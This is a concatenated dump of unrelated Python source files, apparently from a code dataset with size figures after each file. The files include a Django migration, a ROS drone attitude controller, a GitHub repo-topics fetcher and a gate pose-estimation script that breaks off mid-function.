We want the user to get everything right away upon `import nawrapper as nw`.
"""
from .power import *
from .maptools import *
from .covtools import *
from . import planck
| 194 | 57 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('plea', '0014_auto_20151119_1136'),
]
operations = [
migrations.CreateModel(
name='DataValidation',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('date_entered', models.DateTimeField(auto_created=True)),
('urn_entered', models.CharField(max_length=50)),
('urn_standardised', models.CharField(max_length=50)),
('urn_formatted', models.CharField(max_length=50)),
('case_match_count', models.PositiveIntegerField(default=0)),
('case_match', models.ForeignKey(blank=True, to='plea.Case', null=True)),
],
),
]
| 923 | 276 |
from cloudify import ctx
from cloudify.decorators import operation
from a4c_common.wrapper_util import (USE_EXTERNAL_RESOURCE_KEY,handle_external_resource,handle_resource_ids)
from openstack import with_cinder_client
from openstack.volume import create
@operation
@with_cinder_client
def overrided_create_volume(cinder_client, args, **_):
handle_external_resource()
if(ctx.instance.runtime_properties[USE_EXTERNAL_RESOURCE_KEY]):
handle_resource_ids()
create(cinder_client, args, **_)
| 498 | 161 |
from typing import Iterator, List, Optional
from drift_report.domain.model import Model
class ModelRepository:
def __init__(self) -> None:
self.state: List[Model] = []
def create(self, model: Model):
self.state.append(model)
def all(self) -> Iterator[Model]:
return iter(self.state)
def find(self, name: str, version: int) -> Optional[Model]:
for model in self.state:
if (model.name == name) and (model.version == version):
return model
return None
MODEL_REPO = ModelRepository()
| 571 | 166 |
# PART 1
with open('input.txt') as input_file:
x_pos = 0
y_pos = 0
for line in input_file:
direction = line.split(' ')[0]
distance = int(line.split(' ')[1])
if direction == "forward":
x_pos += distance
elif direction == "down":
y_pos += distance
else:
y_pos -= distance
print(x_pos * y_pos)
# PART 2
with open('input.txt') as input_file:
x_pos = 0
y_pos = 0
aim_vector = 0
for line in input_file:
direction = line.split(' ')[0]
distance = int(line.split(' ')[1])
print("*******************************************")
print("direction:", direction)
print("distance:", distance)
print("old_aim:", aim_vector)
print("old_x_pos:", x_pos)
print("old_y_pos:", y_pos)
print("---------------------------")
if direction == "forward":
x_pos += distance
y_pos += aim_vector * distance
elif direction == "down":
aim_vector += distance
else:
aim_vector -= distance
print("direction:", direction)
print("distance:", distance)
print("aim:", aim_vector)
print("x_pos:", x_pos)
print("y_pos:", y_pos)
print("*******************************************")
print("x_pos:", x_pos)
print("y_pos:", y_pos)
print("x*y:", x_pos * y_pos) | 1,407 | 437 |
from typing import Optional
from pydantic import BaseModel
from cosmopy.model import CosmosModel
class Engine(BaseModel):
hp: int
volume: int
class Car(CosmosModel):
make: str
model: str
engine: Optional[Engine]
if __name__ == "__main__":
passat = Car(make="VW", model="Passat")
print(f"Car: {passat}")
passat.save()
passat.model = "Golf"
golf = passat.save()
print(f"Model changed: {golf}")
passat = Car(make="VW", model="Passat", engine=Engine(hp=100, volume=1600))
passat.save()
print(f"New passat: {passat}")
cars_100_hp = Car.query(engine__hp=100)
print(f"Cars with 100 HP: {cars_100_hp}")
cars = Car.all()
print(f"All cars: {cars}")
for c in cars:
print(f"Deleting: {c}")
c.delete()
| 794 | 312 |
#!/usr/bin/env python
import rospy
import tf
import scipy.linalg as la
import numpy as np
from math import *
import mavros_msgs.srv
from mavros_msgs.msg import AttitudeTarget
from nav_msgs.msg import Odometry
from std_msgs.msg import *
from test.msg import *
from geometry_msgs.msg import *
from mavros_msgs.msg import *
from quadcopter.msg import *
import time
import control.matlab as mb
rospy.init_node('sdre', anonymous=True)
pub = rospy.Publisher("/mavros/setpoint_raw/attitude", AttitudeTarget, queue_size=10)
roll = 0.0
pitch = 0.0
yaw = 0.0
msg = AttitudeTarget()
#[10,-10,0] #ardu
goal = np.array([50.0, 5.0, 0.0])
goal_body = np.array([0.0, 0.0, 0.0])
x = 0.0
y = 0.0
z = 0.0
error_head_prev = 0.0
camera_mount = 0.785398
horizontal = 1.04719/2
vertical = 1.04719/2
vel_rover = [0,0,0]
A = np.array([[0, 1, 0, 0, 0, 0]
,[0, 0, 0, 0, 0, 0]
,[0, 0, 0, 1, 0, 0]
,[0, 0, 0, 0, 0, 0]
,[0, 0, 0, 0, 0, 1]
,[0, 0, 0, 0, 0, 0]])
now_p = time.time()
#### msg.x in mavros is -y in gazebo
def land():
set_mode = rospy.ServiceProxy('/mavros/set_mode', mavros_msgs.srv.SetMode)
print "set mode: ", set_mode(208,'GUIDED')
land = rospy.ServiceProxy('/mavros/cmd/land', mavros_msgs.srv.CommandTOL)
print "land: ", land(0,0,0,0,0)
def callback(info):
##MUST GET HEADING
global x, y, z, roll, pitch, yaw, vel_rover, vel_drone_rot, vel_drone_trans, head, now_p, error_head_prev, goal, goal_body
############################ ARDUPILOT-MAVROS COORDINATE FRAME
### Positions in global frame
x = info.pose.pose.position.x
y = info.pose.pose.position.y
z = info.pose.pose.position.z
### Orientations in global frame
a1 = info.pose.pose.orientation.x
b1 = info.pose.pose.orientation.y
c1 = info.pose.pose.orientation.z
d1 = info.pose.pose.orientation.w
### All linear velocities are local
v_x = info.twist.twist.linear.x
v_y = info.twist.twist.linear.y
v_z = info.twist.twist.linear.z
### All angular velocities are local
v_roll = info.twist.twist.angular.x
v_pitch = info.twist.twist.angular.y
v_yaw = info.twist.twist.angular.z
roll, pitch, yaw = tf.transformations.euler_from_quaternion([a1,b1,c1,d1])
Rot_body_to_inertial = np.array([[cos(yaw)*cos(pitch), -sin(yaw)*cos(roll)+sin(roll)*sin(pitch)*cos(yaw), sin(yaw)*sin(roll)+cos(roll)*cos(yaw)*sin(pitch)]
,[sin(yaw)*cos(pitch), cos(yaw)*cos(roll)+sin(roll)*sin(pitch)*sin(yaw), -sin(roll)*cos(yaw)+sin(yaw)*sin(pitch)*cos(roll)]
,[-sin(pitch), cos(pitch)*sin(roll), cos(pitch)*cos(roll)]])
Rot_inertial_to_body = Rot_body_to_inertial.transpose()
goal_body[0] = goal[0]-x
goal_body[1] = goal[1]-y
goal_body[2] = goal[2]-z
#rospy.loginfo("GOA1 %s", goal_body)
#### Global to Body rotation
goal_body = np.matmul(Rot_inertial_to_body,goal_body.transpose())
#rospy.loginfo("GOAL2 %s %s", Rot_inertial_to_body, goal_body)
#rospy.loginfo("GOAL %s", goal_body)
#vel_rover = np.dot(Rot,vel_rover) #### Velocity transformations to be done
#vel_rover_body = [vel_rover[1],vel_rover[0],vel_rover[2]]
Q = np.array([[goal_body[0]**2, 0, 0, 0, 0, 0]
,[0, (goal_body[0]+2)**2, 0, 0, 0, 0]
,[0, 0, goal_body[1]**2, 0, 0, 0]
,[0, 0, 0, (goal_body[1]+2)**2, 0, 0]
,[0, 0, 0, 0, 1, 0]
,[0, 0, 0, 0, 0, 1]])
R = np.array([[abs(goal_body[0]*goal_body[1]), 0, 0]
,[0, goal_body[0]**2, 0]
,[0, 0, goal_body[1]**2]])
### Calculation for control done in body fixed frame
X = np.array([[goal_body[0]],[vel_rover[0]-v_x],[goal_body[1]],[vel_rover[1]-v_y],[goal_body[2]],[vel_rover[2]-v_z]])
### d2(e_x)/dt2 = 0-d2(x)/dt2 so all signs inverted
B = np.array([[0, 0, 0], [0, -9.8, 0], [0, 0, 0], [0, 0, 9.8], [0, 0, 0], [-1, 0, 0]])
#(P,L,G) = mb.care(A, B, Q, R)
P = la.solve_continuous_are(A, B, Q, R)
u = np.matmul(-np.linalg.inv(R),B.transpose())
u = np.matmul(u,P)
u = np.dot(u,X)
#rospy.loginfo("U%s",u)
#Rot = Rot.transpose()
#inputs = np.dot(Rot,[[0], [0], [u[0]]])
u[0] = (u[0]+9.8)*0.5/9.8
if u[0]>0.5:
u[0] = 0.5
if u[1]>15*np.pi/180:
u[1] = 15*np.pi/180
if u[1]<-15*np.pi/180:
u[1] = -15*np.pi/180
if u[2]>15*np.pi/180:
u[2] = 15*np.pi/180
if u[2]<-15*np.pi/180:
u[2] = -15*np.pi/180
now = time.time()
if z<0.25:
land()
else:
quater = tf.transformations.quaternion_from_euler(u[2],u[1],yaw) #+yaw_rate*(now-now_p)
msg.header = Header()
msg.type_mask = 0
msg.orientation.x = quater[0]
msg.orientation.y = quater[1]
msg.orientation.z = quater[2]
msg.orientation.w = quater[3]
msg.body_rate.x = 0.0
msg.body_rate.y = 0.0
msg.body_rate.z = 0.0
msg.thrust = u[0]
##VELOCITIES HERE
pub.publish(msg)
now_p = time.time()
#error_head_prev = error_head
rospy.loginfo("States %s", X)
rospy.loginfo("Inputs %s", u)
#rospy.loginfo("ANGLES %s",[roll, pitch, yaw])
rate = rospy.Rate(10)
'''
def ReceiveTar(data):
global goal, x, y, z, roll, pitch, yaw, camera_mount, horizontal, vertical
xt_image=data.contour.center.x
yt_image=data.contour.center.y
xt_image -= 250
yt_image -= 250
width=data.contour.width
height=data.contour.height
if(width<30 or height<30):
goal[0] = goal[0] + vel_rover[0]*0.1
goal[1] = goal[1] + vel_rover[1]*0.1
ro
#rospy.loginfo("DATA %s %s",xt_image,yt_image)
else:
d_xbound = 2*(z/sin(camera_mount))*tan(horizontal)
x_ppm = d_xbound/500
d_ybound = z/tan(camera_mount-vertical) - z/tan(camera_mount+vertical)
y_ppm = d_ybound/500
x_origin = x + (z/tan(camera_mount))*cos(yaw) #In global frame
y_origin = y + (z/tan(camera_mount))*sin(yaw)
yt_image = -yt_image
xt_image = xt_image*x_ppm
yt_image = yt_image*y_ppm
x_new = x_origin + xt_image*cos(yaw-np.pi/2) - yt_image*sin(yaw-np.pi/2)
y_new = y_origin + xt_image*sin(yaw-np.pi/2) + yt_image*cos(yaw-np.pi/2)
#x_new = x - x_prev*cos(yaw)
#y_new = y - y_prev*sin(yaw)
goal[0] = x_new
goal[1] = y_new
rospy.loginfo("POSN %s %s %s %s ", x_new, y_new, x, y)
'''
def listener():
rospy.Subscriber("/mavros/local_position/odom", Odometry, callback)
#rospy.Subscriber('/landing_target_info_new', TargetInfo,ReceiveTar)
rospy.spin()
if __name__ == '__main__':
try:
listener()
except rospy.ROSInterruptException:
pass | 6,882 | 3,137 |
#!/usr/bin/env python3
import argparse
import asyncio
import json
from aiohttp import ClientSession, BasicAuth, ClientTimeout
import os
import aiohttp_github_helpers as h
GITHUB_USER = os.environ.get('GITHUB_USER', None)
GITHUB_PASS = os.environ.get('GITHUB_PASS', None)
TIMEOUT = ClientTimeout(total=20)
AUTH = None
if GITHUB_USER is not None and GITHUB_PASS is not None:
AUTH = BasicAuth(GITHUB_USER, GITHUB_PASS)
ORG = "metwork-framework"
TOPICS_TO_EXCLUDE = ["testrepo"]
async def get_repo_topics(owner, name):
topics = []
async with ClientSession(auth=AUTH, timeout=TIMEOUT) as session:
topics = await h.github_get_repo_topics(session, owner, name)
return topics
parser = argparse.ArgumentParser(description='get repo topics')
parser.add_argument('owner', type=str, help='repo owner')
parser.add_argument('name', type=str, help='repo name')
parser.add_argument('--json', action='store_true',
help='if set, format the output as a json list')
args = parser.parse_args()
loop = asyncio.get_event_loop()
reply = loop.run_until_complete(get_repo_topics(args.owner, args.name))
loop.close()
if args.json:
print(json.dumps(reply))
else:
for topic in reply:
print(topic)
| 1,233 | 417 |
# import support libraries
import os
import time
import numpy as np
# import main working libraries
import cv2
import torch
from torch.autograd import Variable
from torchvision import transforms
from PIL import Image
# import app libraries
from darknet import Darknet
from utils import *
from MeshPly import MeshPly
class Line():
def __init__(self,p1,p2):
# tilt
if( (p2[0]-p1[0]) == 0.0 ):
self.m = "NaN" # vertical line
else:
self.m = (p2[1]-p1[1])/(p2[0]-p1[0])
# intercept
if(self.m == "NaN"):
self.b = "NaN"
else:
self.b = -1.0*self.m*p1[0] + p1[1]
self.p = p1 #store one sample
def eval(self,x):
# TODO verify if line is vertical
return(x*self.m + self.b)
def find_intersection(l1, l2):
x = (l2.b - l1.b)/(l1.m - l2.m) # x coord of intersection point
y = l1.eval(x) # y coord of intersection point
return x,y
# estimate bounding box
#@torch.no_grad
def test(datacfg, cfgfile, weightfile, imgfile):
# ******************************************#
# PARAMETERS PREPARATION #
# ******************************************#
#parse configuration files
options = read_data_cfg(datacfg)
meshname = options['mesh']
name = options['name']
#Parameters for the network
seed = int(time.time())
gpus = '0' # define gpus to use
test_width = 608 # define test image size
test_height = 608
torch.manual_seed(seed) # seed torch random
use_cuda = True
if use_cuda:
os.environ['CUDA_VISIBLE_DEVICES'] = gpus
torch.cuda.manual_seed(seed) # seed cuda random
conf_thresh = 0.1
num_classes = 1
# Read object 3D model, get 3D Bounding box corners
mesh = MeshPly(meshname)
vertices = np.c_[np.array(mesh.vertices), np.ones((len(mesh.vertices), 1))].transpose()
#print("Vertices are:\n {} Shape: {} Type: {}".format(vertices,vertices.shape, type(vertices)))
corners3D = get_3D_corners(vertices)
feet_cm = 30.48 # 1 ft = 30.48 cm
corners3D[0] = np.array([-11*feet_cm/2.0, -11*feet_cm/2.0, -11*feet_cm/2.0, -11*feet_cm/2.0, 11*feet_cm/2.0, 11*feet_cm/2.0, 11*feet_cm/2.0, 11*feet_cm/2.0])
corners3D[1] = np.array([-feet_cm/2.0, -feet_cm/2.0, feet_cm/2.0, feet_cm/2.0, -feet_cm/2.0, -feet_cm/2.0, feet_cm/2.0, feet_cm/2.0])
corners3D[2] = np.array([-11*feet_cm/2.0, 11*feet_cm/2.0, -11*feet_cm/2.0, 11*feet_cm/2.0, -11*feet_cm/2.0, 11*feet_cm/2.0, -11*feet_cm/2.0, 11*feet_cm/2.0])
#print("3D Corners are:\n {} Shape: {} Type: {}".format(corners3D,corners3D.shape, type(corners3D)))
diam = float(options['diam'])
# now configure camera intrinsics
internal_calibration = get_camera_intrinsic()
# ******************************************#
# NETWORK CREATION #
# ******************************************#
# Create the network based on cfg file
model = Darknet(cfgfile)
#model.print_network()
model.load_weights(weightfile)
model.cuda()
model.eval()
# ******************************************#
# INPUT IMAGE PREPARATION FOR NN #
# ******************************************#
# Now prepare image: convert to RGB, resize, transform to Tensor
# use cuda,
img = Image.open(imgfile).convert('RGB')
ori_size = img.size # store original size
img = img.resize((test_width, test_height))
t1 = time.time()
img = transforms.Compose([transforms.ToTensor(),])(img)#.float()
img = Variable(img, requires_grad = True)
img = img.unsqueeze(0)
img = img.cuda()
# ******************************************#
# PASS IT TO NETWORK AND GET PREDICTION #
# ******************************************#
# Forward pass
output = model(img).data
#print("Output Size: {}".format(output.size(0)))
t2 = time.time()
# ******************************************#
# EXTRACT PREDICTIONS #
# ******************************************#
# Using confidence threshold, eliminate low-confidence predictions
# and get only boxes over the confidence threshold
all_boxes = get_region_boxes(output, conf_thresh, num_classes)
boxes = all_boxes[0]
# iterate through boxes to find the one with highest confidence
best_conf_est = -1
best_box_index = -1
for j in range(len(boxes)):
# the confidence is in index = 18
if( boxes[j][18] > best_conf_est):
box_pr = boxes[j] # get bounding box
best_conf_est = boxes[j][18]
best_box_index = j
#print("Best box is: {} and 2D prediction is {}".format(best_box_index,box_pr))
#print("Confidence is: {}".format(best_conf_est))
print(best_conf_est.item(),type(best_conf_est.item()))
# Denormalize the corner predictions
# This are the predicted 2D points with which a bounding cube can be drawn
corners2D_pr = np.array(np.reshape(box_pr[:18], [9, 2]), dtype='float32')
corners2D_pr[:, 0] = corners2D_pr[:, 0] * ori_size[0] # Width
corners2D_pr[:, 1] = corners2D_pr[:, 1] * ori_size[1] # Height
t3 = time.time()
# **********************************************#
# GET OBJECT POSE ESTIMATION #
# Remember the problem in 6D Pose estimation #
# is exactly to estimate the pose - position #
# and orientation of the object of interest #
# with reference to a camera frame. That is #
# why although the 2D projection of the 3D #
# bounding cube are ready, we still need to #
# compute the rotation matrix -orientation- #
# and a translation vector -position- for the #
# object #
# #
# **********************************************#
# get rotation matrix and transform
R_pr, t_pr = pnp(np.array(np.transpose(np.concatenate((np.zeros((3, 1)), corners3D[:3, :]), axis=1)), dtype='float32'), corners2D_pr, np.array(internal_calibration, dtype='float32'))
t4 = time.time()
# ******************************************#
# DISPLAY IMAGE WITH BOUNDING CUBE #
# ******************************************#
# Reload Original img
img = cv2.imread(imgfile)
# create a window to display image
wname = "Prediction"
cv2.namedWindow(wname)
# draw each predicted 2D point
for i, (x,y) in enumerate(corners2D_pr):
# get colors to draw the lines
col1 = 28*i
col2 = 255 - (28*i)
col3 = np.random.randint(0,256)
cv2.circle(img, (x,y), 3, (col1,col2,col3), -1)
cv2.putText(img, str(i), (int(x) + 5, int(y) + 5),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (col1, col2, col3), 1)
# Get each predicted point and the centroid
p1 = corners2D_pr[1]
p2 = corners2D_pr[2]
p3 = corners2D_pr[3]
p4 = corners2D_pr[4]
p5 = corners2D_pr[5]
p6 = corners2D_pr[6]
p7 = corners2D_pr[7]
p8 = corners2D_pr[8]
center = corners2D_pr[0]
# Draw cube lines around detected object
# draw front face
line_point = 2
cv2.line(img,(p1[0],p1[1]),(p2[0],p2[1]), (0,255,0),line_point)
cv2.line(img,(p2[0],p2[1]),(p4[0],p4[1]), (0,255,0),line_point)
cv2.line(img,(p4[0],p4[1]),(p3[0],p3[1]), (0,255,0),line_point)
cv2.line(img,(p3[0],p3[1]),(p1[0],p1[1]), (0,255,0),line_point)
# draw back face
cv2.line(img,(p5[0],p5[1]),(p6[0],p6[1]), (0,255,0),line_point)
cv2.line(img,(p7[0],p7[1]),(p8[0],p8[1]), (0,255,0),line_point)
cv2.line(img,(p6[0],p6[1]),(p8[0],p8[1]), (0,255,0),line_point)
cv2.line(img,(p5[0],p5[1]),(p7[0],p7[1]), (0,255,0),line_point)
# draw right face
cv2.line(img,(p2[0],p2[1]),(p6[0],p6[1]), (0,255,0),line_point)
cv2.line(img,(p1[0],p1[1]),(p5[0],p5[1]), (0,255,0),line_point)
# draw left face
cv2.line(img,(p3[0],p3[1]),(p7[0],p7[1]), (0,255,0),line_point)
cv2.line(img,(p4[0],p4[1]),(p8[0],p8[1]), (0,255,0),line_point)
# Calculate gate dimensions
min_x = np.min(corners3D[0,:]) # this are the gate outermost corners
max_x = np.max(corners3D[0,:])
min_y = np.min(corners3D[1,:])
max_y = np.max(corners3D[1,:])
min_z = np.min(corners3D[2,:])
max_z = np.max(corners3D[2,:])
gate_dim_z = max_z - min_z
gate_dim_x = max_x - min_x
gate_dim_y = max_y - min_y
############################################################
# PREDICT FLYABLE AREA BASED ON ESTIMATED 2D PROJECTIONS
############################################################
# Calculate Fly are based based on offset from predicted 2D
# Projection
flyarea_side = 243.84 #cm 8ft
offset_z = (gate_dim_z - flyarea_side)/2.0
offset_x = (gate_dim_x - flyarea_side)/2.0
offset_z_ratio = (offset_z/gate_dim_z) # calculate as ratio wrt side, to use with pixels later
offset_x_ratio = (offset_x/gate_dim_x)
#print("Offset X ratio: {}, Offset Z ratio: {}".format(offset_x_ratio,offset_z_ratio))
# GATE FRONT
#
# array to store all 4 points
flyarea_corners_front = np.zeros((4,2), dtype = 'float32')
# corner 1
flyarea_corners_front[0][0] = p4[0] + int((p2[0]-p4[0])*offset_x_ratio)
flyarea_corners_front[0][1] = p4[1] + int((p3[1]-p4[1])*offset_z_ratio)
# corner 2
flyarea_corners_front[1][0] = p2[0] + int((p4[0]-p2[0])*offset_x_ratio)
flyarea_corners_front[1][1] = p2[1] + int((p1[1]-p2[1])*offset_x_ratio)
# corner 3
flyarea_corners_front[2][0] = p1[0] + int((p3[0]-p1[0])*offset_x_ratio)
flyarea_corners_front[2][1] = p1[1] + int((p2[1]-p1[1])*offset_x_ratio)
# corner 4
flyarea_corners_front[3][0] = p3[0] + int((p1[0]-p3[0])*offset_x_ratio)
flyarea_corners_front[3][1] = p3[1] + int((p4[1]-p3[1])*offset_x_ratio)
#print("Front points: {}".format(flyarea_corners_front))
# draw front gate area
fa_p1_f = flyarea_corners_front[0]
fa_p2_f = flyarea_corners_front[1]
fa_p3_f = flyarea_corners_front[2]
fa_p4_f = flyarea_corners_front[3]
"""
cv2.line(img,(fa_p1_f[0],fa_p1_f[1]),(fa_p2_f[0],fa_p2_f[1]), (255,0,255),line_point)
cv2.line(img,(fa_p2_f[0],fa_p2_f[1]),(fa_p3_f[0],fa_p3_f[1]), (255,0,255),line_point)
cv2.line(img,(fa_p4_f[0],fa_p4_f[1]),(fa_p1_f[0],fa_p1_f[1]), (255,0,255),line_point)
cv2.line(img,(fa_p3_f[0],fa_p3_f[1]),(fa_p4_f[0],fa_p4_f[1]), (255,0,255),line_point)
"""
# GATE BACK
#
# array to store all 4 points
flyarea_corners_back = np.zeros((4,2), dtype = 'float32')
# corner 1
flyarea_corners_back[0][0] = p8[0] + int((p6[0]-p8[0])*offset_x_ratio)
flyarea_corners_back[0][1] = p8[1] + int((p7[1]-p8[1])*offset_z_ratio)
# corner 2
flyarea_corners_back[1][0] = p6[0] + int((p8[0]-p6[0])*offset_x_ratio)
flyarea_corners_back[1][1] = p6[1] + int((p5[1]-p6[1])*offset_x_ratio)
# corner 3
flyarea_corners_back[2][0] = p5[0] + int((p7[0]-p5[0])*offset_x_ratio)
flyarea_corners_back[2][1] = p5[1] + int((p6[1]-p5[1])*offset_x_ratio)
# corner 4
flyarea_corners_back[3][0] = p7[0] + int((p5[0]-p7[0])*offset_x_ratio)
flyarea_corners_back[3][1] = p7[1] + int((p8[1]-p7[1])*offset_x_ratio)
#print("Back points: {}".format(flyarea_corners_back))
# draw back gate area
fa_p1_b = flyarea_corners_back[0]
fa_p2_b = flyarea_corners_back[1]
fa_p3_b = flyarea_corners_back[2]
fa_p4_b = flyarea_corners_back[3]
"""
cv2.line(img,(fa_p1_b[0],fa_p1_b[1]),(fa_p2_b[0],fa_p2_b[1]), (255,0,255),line_point)
cv2.line(img,(fa_p2_b[0],fa_p2_b[1]),(fa_p3_b[0],fa_p3_b[1]), (255,0,255),line_point)
cv2.line(img,(fa_p4_b[0],fa_p4_b[1]),(fa_p1_b[0],fa_p1_b[1]), (255,0,255),line_point)
cv2.line(img,(fa_p3_b[0],fa_p3_b[1]),(fa_p4_b[0],fa_p4_b[1]), (255,0,255),line_point)
"""
"""
# draw each predicted 2D point
for i, (x,y) in enumerate(flyarea_corners_front):
# get colors to draw the lines
col1 = 0#np.random.randint(0,256)
col2 = 0#np.random.randint(0,256)
col3 = 255#np.random.randint(0,256)
cv2.circle(img, (x,y), 3, (col1,col2,col3), -1)
cv2.putText(img, str(i), (int(x) + 5, int(y) + 5),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (col1, col2, col3), 1)
# draw each predicted 2D point
for i, (x,y) in enumerate(flyarea_corners_back):
# get colors to draw the lines
col1 = 0#np.random.randint(0,256)
col2 = 0#np.random.randint(0,256)
col3 = 255#np.random.randint(0,256)
cv2.circle(img, (x,y), 3, (col1,col2,col3), -1)
cv2.putText(img, str(i+4), (int(x) + 5, int(y) + 5),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (col1, col2, col3), 1)
"""
# GATE ALL FRONT AND BACK
# LINES
# FRONT
front_up = Line(flyarea_corners_front[0],flyarea_corners_front[1])
front_right = Line(flyarea_corners_front[1],flyarea_corners_front[2])
front_down = Line(flyarea_corners_front[2],flyarea_corners_front[3])
front_left = Line(flyarea_corners_front[3],flyarea_corners_front[0])
#print("Front Up Line: m {:.4f} b{:.4f}".format(front_up.m, front_up.b))
#print("Front Right Line: m {:.4f} b{:.4f}".format(front_right.m, front_right.b))
#print("Front Down Line: m {:.4f} b{:.4f}".format(front_down.m, front_down.b))
#print("Front Left Line: m {:.4f} b{:.4f}".format(front_left.m, front_left.b))
# BACK
back_up = Line(flyarea_corners_back[0],flyarea_corners_back[1])
back_right = Line(flyarea_corners_back[1],flyarea_corners_back[2])
back_down = Line(flyarea_corners_back[2],flyarea_corners_back[3])
back_left = Line(flyarea_corners_back[3],flyarea_corners_back[0])
#print("Back Up Line: m {:.4f} b{:.4f}".format(back_up.m, back_up.b))
#print("Back Right Line: m {:.4f} b{:.4f}".format(back_right.m, back_right.b))
#print("Back Down Line: m {:.4f} b{:.4f}".format(back_down.m, back_down.b))
#print("Back Left Line: m {:.4f} b{:.4f}".format(back_left.m, back_left.b))
# Intersections
intersections = np.zeros((8,2))
# store in an structure that makes looping easy
front_lines = [[front_right,front_left],[front_right,front_left],[front_up,front_down],[front_up,front_down]]
back_lines = [back_up,back_down,back_right,back_left]
# compare back line with corresponding front lines
for k, (back_line, front_line_pair) in enumerate(zip(back_lines, front_lines)):
for j, front_line in enumerate(front_line_pair):
x_i = (back_line.b - front_line.b)/(front_line.m - back_line.m) # x coord of intersection point
y_i = back_line.eval(x_i) # y coord of intersection point
intersections[k*2+j][0] = x_i
intersections[k*2+j][1] = y_i
#print("Intersections: ")
#print(intersections)
# draw each intersection point
#for i, (x,y) in enumerate(intersections):
#cv2.circle(img, (int(x),int(y)), 3, (0,255,255), -1)
#cv2.putText(img, str(i), (int(x) + 5, int(y) + 5),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,255,255), 1)
# group all points
points = np.concatenate((flyarea_corners_front,flyarea_corners_back, intersections), axis = 0)
# the corners of the flyable area is composed of the 4 points with the
# shortest distance to the centroid
points_sorted = [(np.linalg.norm(points[i]-center),points[i]) for i in range(points.shape[0])]
points_sorted.sort()
#print(points_sorted)
flyarea_corners = np.zeros((4,2), dtype = 'float32')
"""
for k in range(4):
#print(k)
point = points_sorted[k][1]
#print(point)
flyarea_corners[k] = point
x = point[0]
y = point[1]
cv2.circle(img, (int(x),int(y)), 10, (0,255,255), -1)
cv2.putText(img, str(k), (int(x) + 5, int(y) + 5),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,255,255), 1)
"""
# corner 1
x1,y1 = find_intersection(front_up,back_left)
dummy1 = np.array([x1,y1])
x1,y1 = find_intersection(back_up,front_left)
dummy2 = np.array([x1,y1])
c_points = np.stack((flyarea_corners_front[0],flyarea_corners_back[0],dummy1,dummy2))
points_sorted = [(np.linalg.norm(c_points[i]-center),c_points[i]) for i in range(c_points.shape[0])]
points_sorted.sort()
flyarea_corners[0]=points_sorted[0][1] # extract the point with shortest distance to centroid
"""
# draw each intersection point
for i, (x,y) in enumerate(c_points):
cv2.circle(img, (int(x),int(y)), 3, (0,255,255), -1)
cv2.putText(img, str(i), (int(x) + 5, int(y) + 5),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,255,255), 1)
"""
# corner 2
x1,y1 = find_intersection(front_up,back_right)
dummy1 = np.array([x1,y1])
x1,y1 = find_intersection(back_up,front_right)
dummy2 = np.array([x1,y1])
c_points = np.stack((flyarea_corners_front[1],flyarea_corners_back[1],dummy1,dummy2))
points_sorted = [(np.linalg.norm(c_points[i]-center),c_points[i]) for i in range(c_points.shape[0])]
points_sorted.sort()
flyarea_corners[1]=points_sorted[0][1] # extract the point with shortest distance to centroid
"""
# draw each intersection point
for i, (x,y) in enumerate(c_points):
cv2.circle(img, (int(x),int(y)), 3, (0,255,255), -1)
cv2.putText(img, str(i), (int(x) + 5, int(y) + 5),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,255,255), 1)
"""
# corner 3
x1,y1 = find_intersection(front_down,back_right)
dummy1 = np.array([x1,y1])
x1,y1 = find_intersection(back_down,front_right)
dummy2 = np.array([x1,y1])
c_points = np.stack((flyarea_corners_front[2],flyarea_corners_back[2],dummy1,dummy2))
points_sorted = [(np.linalg.norm(c_points[i]-center),c_points[i]) for i in range(c_points.shape[0])]
points_sorted.sort()
flyarea_corners[2]=points_sorted[0][1] # extract the point with shortest distance to centroid
"""
# draw each intersection point
for i, (x,y) in enumerate(c_points):
cv2.circle(img, (int(x),int(y)), 3, (0,255,255), -1)
cv2.putText(img, str(i), (int(x) + 5, int(y) + 5),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,255,255), 1)
"""
# corner 4
x1,y1 = find_intersection(front_down,back_left)
dummy1 = np.array([x1,y1])
x1,y1 = find_intersection(back_down,front_left)
dummy2 = np.array([x1,y1])
c_points = np.stack((flyarea_corners_front[3],flyarea_corners_back[3],dummy1,dummy2))
points_sorted = [(np.linalg.norm(c_points[i]-center),c_points[i]) for i in range(c_points.shape[0])]
points_sorted.sort()
flyarea_corners[3]=points_sorted[0][1] # extract the point with shortest distance to centroid
"""
# draw each intersection point
for i, (x,y) in enumerate(c_points):
cv2.circle(img, (int(x),int(y)), 3, (0,255,255), -1)
cv2.putText(img, str(i), (int(x) + 5, int(y) + 5),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,255,255), 1)
"""
fa_p1 = flyarea_corners[0]
fa_p2 = flyarea_corners[1]
fa_p3 = flyarea_corners[2]
fa_p4 = flyarea_corners[3]
"""
cv2.line(img,(fa_p1[0],fa_p1[1]),(fa_p2[0],fa_p2[1]), (0,0,255),line_point)
cv2.line(img,(fa_p2[0],fa_p2[1]),(fa_p3[0],fa_p3[1]), (0,0,255),line_point)
cv2.line(img,(fa_p4[0],fa_p4[1]),(fa_p1[0],fa_p1[1]), (0,0,255),line_point)
cv2.line(img,(fa_p3[0],fa_p3[1]),(fa_p4[0],fa_p4[1]), (0,0,255),line_point)
"""
# YET ANOTHER METHOD
if( back_up.p[1] > front_up.p[1]):
up_line = back_up
else:
up_line = front_up
if( back_down.p[1] < front_down.p[1]):
down_line = back_down
else:
down_line = front_down
if( back_right.p[0] < front_right.p[0]):
right_line = back_right
else:
right_line = front_right
if( back_left.p[0] > front_left.p[0] ):
left_line = back_left
else:
left_line = front_left
x1,y1 = find_intersection(up_line,left_line)
dummy1 = np.array([x1,y1])
flyarea_corners[0] = dummy1
x1,y1 = find_intersection(up_line,right_line)
dummy1 = np.array([x1,y1])
flyarea_corners[1] = dummy1
x1,y1 = find_intersection(down_line,right_line)
dummy1 = np.array([x1,y1])
flyarea_corners[2] = dummy1
x1,y1 = find_intersection(down_line,left_line)
